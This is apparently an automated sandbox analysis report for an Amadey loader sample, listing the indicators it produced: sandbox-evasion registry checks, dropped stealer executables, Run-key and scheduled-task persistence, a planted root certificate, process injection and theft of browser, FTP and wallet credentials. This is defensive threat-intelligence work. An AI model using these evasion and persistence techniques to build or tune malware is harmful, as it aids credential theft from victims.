amadey | 63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f

Virtualization/Sandbox Evasion

Processes:

explorku.exeaxplons.exe4b58e49bf4.exeaxplons.exeaxplons.exeexplorku.exe63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exeexplorku.exeaxplons.exeexplorku.exeamers.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4b58e49bf4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amers.exe

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

92 2476 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

872 powershell.exe
956 powershell.exe
2540 powershell.exe
1852 powershell.exe
3040 powershell.exe
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

flow	pid	process
92	2476	powershell.exe

pid	process
872	powershell.exe
956	powershell.exe
2540	powershell.exe
1852	powershell.exe
3040	powershell.exe

Checks BIOS information in registry 2 TTPs 22 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

amers.exeaxplons.exeexplorku.exeaxplons.exeexplorku.exeaxplons.exeexplorku.exe63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exe4b58e49bf4.exeexplorku.exeaxplons.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amers.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amers.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4b58e49bf4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4b58e49bf4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe

Executes dropped EXE 50 IoCs

Processes:

explorku.exeamers.exeaxplons.exe4b58e49bf4.exeexplorku.exeaxplons.exealex.exetrf.exekeks.exegold.exeredline1.exeinstall.exeGameService.exeGameService.exeGameService.exeGameService.exeGameService.exeGameSyncLink.exe189993.exeswizzhis.exeGameService.exeGameService.exeGameService.exeGameService.exeGameService.exePiercingNetLink.exelumma1.exeGameService.exeGameService.exeGameService.exeGameService.exeGameSyncLinks.exe731486.exefile300un.exeNewB.exetaskmgr.exeISetup8.exetoolspub1.exe4767d2e713f2021e8fe856e3ea638b58.exeu3mw.0.exeu3mw.1.exeNewB.exetaskmgr.exeaxplons.exeexplorku.exe4767d2e713f2021e8fe856e3ea638b58.exeNewB.exetaskmgr.exeaxplons.exeexplorku.exe

pid	process
1472	explorku.exe
784	amers.exe
4968	axplons.exe
664	4b58e49bf4.exe
3136	explorku.exe
3912	axplons.exe
1204	alex.exe
4324	trf.exe
1892	keks.exe
1136	gold.exe
2476	redline1.exe
764	install.exe
3168	GameService.exe
3688	GameService.exe
2456	GameService.exe
2356	GameService.exe
4436	GameService.exe
5088	GameSyncLink.exe
2824	189993.exe
3928	swizzhis.exe
2140	GameService.exe
4584	GameService.exe
3168	GameService.exe
4752	GameService.exe
4716	GameService.exe
4684	PiercingNetLink.exe
2064	lumma1.exe
4564	GameService.exe
8	GameService.exe
1924	GameService.exe
1204	GameService.exe
4744	GameSyncLinks.exe
884	731486.exe
2348	file300un.exe
4980	NewB.exe
2636	taskmgr.exe
4712	ISetup8.exe
1932	toolspub1.exe
3196	4767d2e713f2021e8fe856e3ea638b58.exe
2396	u3mw.0.exe
4144	u3mw.1.exe
4568	NewB.exe
2280	taskmgr.exe
1944	axplons.exe
4736	explorku.exe
4656	4767d2e713f2021e8fe856e3ea638b58.exe
1944	NewB.exe
2824	taskmgr.exe
3596	axplons.exe
3928	explorku.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

amers.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Wine	amers.exe
Key opened	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Wine	axplons.exe

Loads dropped DLL 5 IoCs

Processes:

189993.exeRegAsm.exeu3mw.0.exe

pid process

2824 189993.exe
2704 RegAsm.exe
2704 RegAsm.exe
2396 u3mw.0.exe
2396 u3mw.0.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2824	189993.exe
2704	RegAsm.exe
2704	RegAsm.exe
2396	u3mw.0.exe
2396	u3mw.0.exe

Themida packer 44 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/3568-0-0x0000000000850000-0x0000000000D48000-memory.dmp	themida
behavioral2/memory/3568-1-0x0000000000850000-0x0000000000D48000-memory.dmp	themida
behavioral2/memory/3568-3-0x0000000000850000-0x0000000000D48000-memory.dmp	themida
behavioral2/memory/3568-5-0x0000000000850000-0x0000000000D48000-memory.dmp	themida
behavioral2/memory/3568-7-0x0000000000850000-0x0000000000D48000-memory.dmp	themida
behavioral2/memory/3568-8-0x0000000000850000-0x0000000000D48000-memory.dmp	themida
behavioral2/memory/3568-6-0x0000000000850000-0x0000000000D48000-memory.dmp	themida
behavioral2/memory/3568-4-0x0000000000850000-0x0000000000D48000-memory.dmp	themida
behavioral2/memory/3568-2-0x0000000000850000-0x0000000000D48000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe	themida
behavioral2/memory/1472-22-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/1472-25-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/1472-29-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/1472-27-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/1472-26-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/1472-28-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/1472-24-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/3568-21-0x0000000000850000-0x0000000000D48000-memory.dmp	themida
behavioral2/memory/1472-30-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
C:\Users\Admin\1000006002\4b58e49bf4.exe	themida
behavioral2/memory/1472-82-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/664-84-0x0000000000420000-0x0000000000A9F000-memory.dmp	themida
behavioral2/memory/664-87-0x0000000000420000-0x0000000000A9F000-memory.dmp	themida
behavioral2/memory/664-90-0x0000000000420000-0x0000000000A9F000-memory.dmp	themida
behavioral2/memory/664-91-0x0000000000420000-0x0000000000A9F000-memory.dmp	themida
behavioral2/memory/664-89-0x0000000000420000-0x0000000000A9F000-memory.dmp	themida
behavioral2/memory/664-88-0x0000000000420000-0x0000000000A9F000-memory.dmp	themida
behavioral2/memory/664-86-0x0000000000420000-0x0000000000A9F000-memory.dmp	themida
behavioral2/memory/664-85-0x0000000000420000-0x0000000000A9F000-memory.dmp	themida
behavioral2/memory/664-83-0x0000000000420000-0x0000000000A9F000-memory.dmp	themida
behavioral2/memory/3136-94-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/3136-98-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/3136-100-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/3136-99-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/3136-97-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/3136-96-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/3136-95-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/3136-93-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/3136-104-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/664-234-0x0000000000420000-0x0000000000A9F000-memory.dmp	themida
behavioral2/memory/4736-775-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/4736-786-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/3928-912-0x0000000000C40000-0x0000000001138000-memory.dmp	themida
behavioral2/memory/3928-920-0x0000000000C40000-0x0000000001138000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorku.exetaskmgr.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\4b58e49bf4.exe = "C:\\Users\\Admin\\1000006002\\4b58e49bf4.exe"	explorku.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskmgr = "C:\\ProgramData\\taskmgr.exe"	taskmgr.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

Processes:

63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exeexplorku.exe4b58e49bf4.exeexplorku.exeexplorku.exeexplorku.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4b58e49bf4.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

32 ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

amers.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exe

pid process

784 amers.exe
4968 axplons.exe
3912 axplons.exe
1944 axplons.exe
3596 axplons.exe

flow	ioc
32	ip-api.com

Suspicious use of SetThreadContext 5 IoCs

Processes:

alex.exegold.exeswizzhis.exelumma1.exefile300un.exe

description	pid	process	target process
PID 1204 set thread context of 4912	1204	alex.exe	RegAsm.exe
PID 1136 set thread context of 4552	1136	gold.exe	RegAsm.exe
PID 3928 set thread context of 2704	3928	swizzhis.exe	RegAsm.exe
PID 2064 set thread context of 2076	2064	lumma1.exe	RegAsm.exe
PID 2348 set thread context of 2356	2348	file300un.exe	installutil.exe

Drops file in Program Files directory 15 IoCs

Processes:

install.exeGameSyncLinks.exe

description	ioc	process
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\status.txt	GameSyncLinks.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe

Drops file in Windows directory 2 IoCs

Processes:

63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exeamers.exe

description	ioc	process
File created	C:\Windows\Tasks\explorku.job	63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exe
File created	C:\Windows\Tasks\axplons.job	amers.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

2108 sc.exe
2320 sc.exe
4756 sc.exe
3664 sc.exe
2512 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2108	sc.exe
2320	sc.exe
4756	sc.exe
3664	sc.exe
2512	sc.exe

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2772	1204	WerFault.exe	alex.exe
5008	2356	WerFault.exe	installutil.exe
4692	1932	WerFault.exe	toolspub1.exe
1708	4712	WerFault.exe	ISetup8.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

toolspub1.exeu3mw.1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3mw.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3mw.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3mw.1.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

RegAsm.exeu3mw.0.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u3mw.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u3mw.0.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1060 schtasks.exe
1124 schtasks.exe
Modifies registry class 1 IoCs

Processes:

taskmgr.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings taskmgr.exe

pid	process
1060	schtasks.exe
1124	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings	taskmgr.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

keks.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	keks.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	keks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

taskmgr.exe

pid process

2636 taskmgr.exe

pid	process
2636	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

amers.exeaxplons.exeaxplons.exetrf.exeRegAsm.exeredline1.exekeks.exepowershell.exeu3mw.0.exepowershell.exepowershell.exepowershell.exetaskmgr.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeaxplons.exe

pid	process
784	amers.exe
784	amers.exe
4968	axplons.exe
4968	axplons.exe
3912	axplons.exe
3912	axplons.exe
4324	trf.exe
4324	trf.exe
2704	RegAsm.exe
2704	RegAsm.exe
2476	redline1.exe
2476	redline1.exe
2476	redline1.exe
2476	redline1.exe
2476	redline1.exe
2476	redline1.exe
2704	RegAsm.exe
2704	RegAsm.exe
1892	keks.exe
1892	keks.exe
1892	keks.exe
1892	keks.exe
1892	keks.exe
1892	keks.exe
1852	powershell.exe
1852	powershell.exe
1852	powershell.exe
2396	u3mw.0.exe
2396	u3mw.0.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
956	powershell.exe
956	powershell.exe
956	powershell.exe
2540	powershell.exe
2540	powershell.exe
2540	powershell.exe
2636	taskmgr.exe
2636	taskmgr.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
1944	axplons.exe
1944	axplons.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

trf.exeredline1.exe731486.exetaskmgr.exekeks.exeRegAsm.exepowershell.exepowershell.exepowershell.exepowershell.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exetaskmgr.exepowershell.exepowershell.exe4767d2e713f2021e8fe856e3ea638b58.exetaskmgr.exe

description	pid	process
Token: SeDebugPrivilege	4324	trf.exe
Token: SeBackupPrivilege	4324	trf.exe
Token: SeSecurityPrivilege	4324	trf.exe
Token: SeSecurityPrivilege	4324	trf.exe
Token: SeSecurityPrivilege	4324	trf.exe
Token: SeSecurityPrivilege	4324	trf.exe
Token: SeDebugPrivilege	2476	redline1.exe
Token: SeLockMemoryPrivilege	884	731486.exe
Token: SeDebugPrivilege	2636	taskmgr.exe
Token: SeDebugPrivilege	1892	keks.exe
Token: SeDebugPrivilege	4912	RegAsm.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeDebugPrivilege	2636	taskmgr.exe
Token: SeDebugPrivilege	3984	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Token: SeDebugPrivilege	2280	taskmgr.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	3196	4767d2e713f2021e8fe856e3ea638b58.exe
Token: SeImpersonatePrivilege	3196	4767d2e713f2021e8fe856e3ea638b58.exe
Token: SeDebugPrivilege	2824	taskmgr.exe

Suspicious use of FindShellTrayWindow 8 IoCs

Processes:

731486.exeu3mw.1.exe

pid process

884 731486.exe
4144 u3mw.1.exe
4144 u3mw.1.exe
4144 u3mw.1.exe
4144 u3mw.1.exe
4144 u3mw.1.exe
4144 u3mw.1.exe
4144 u3mw.1.exe
Suspicious use of SendNotifyMessage 7 IoCs

Processes:

u3mw.1.exe

pid process

4144 u3mw.1.exe
4144 u3mw.1.exe
4144 u3mw.1.exe
4144 u3mw.1.exe
4144 u3mw.1.exe
4144 u3mw.1.exe
4144 u3mw.1.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

taskmgr.exe

pid process

2636 taskmgr.exe

pid	process
884	731486.exe
4144	u3mw.1.exe
4144	u3mw.1.exe
4144	u3mw.1.exe
4144	u3mw.1.exe
4144	u3mw.1.exe
4144	u3mw.1.exe
4144	u3mw.1.exe

pid	process
4144	u3mw.1.exe
4144	u3mw.1.exe
4144	u3mw.1.exe
4144	u3mw.1.exe
4144	u3mw.1.exe
4144	u3mw.1.exe
4144	u3mw.1.exe

pid	process
2636	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exeexplorku.exeamers.exeaxplons.exealex.exeRegAsm.exegold.exeinstall.execmd.exe

description	pid	process	target process
PID 3568 wrote to memory of 1472	3568	63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exe	explorku.exe
PID 3568 wrote to memory of 1472	3568	63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exe	explorku.exe
PID 3568 wrote to memory of 1472	3568	63a57d86f18040563e6b0a9fa14c3470cbd614b6e6e58068e50b6e3594db0e3f.exe	explorku.exe
PID 1472 wrote to memory of 2312	1472	explorku.exe	explorku.exe
PID 1472 wrote to memory of 2312	1472	explorku.exe	explorku.exe
PID 1472 wrote to memory of 2312	1472	explorku.exe	explorku.exe
PID 1472 wrote to memory of 784	1472	explorku.exe	amers.exe
PID 1472 wrote to memory of 784	1472	explorku.exe	amers.exe
PID 1472 wrote to memory of 784	1472	explorku.exe	amers.exe
PID 784 wrote to memory of 4968	784	amers.exe	axplons.exe
PID 784 wrote to memory of 4968	784	amers.exe	axplons.exe
PID 784 wrote to memory of 4968	784	amers.exe	axplons.exe
PID 1472 wrote to memory of 664	1472	explorku.exe	4b58e49bf4.exe
PID 1472 wrote to memory of 664	1472	explorku.exe	4b58e49bf4.exe
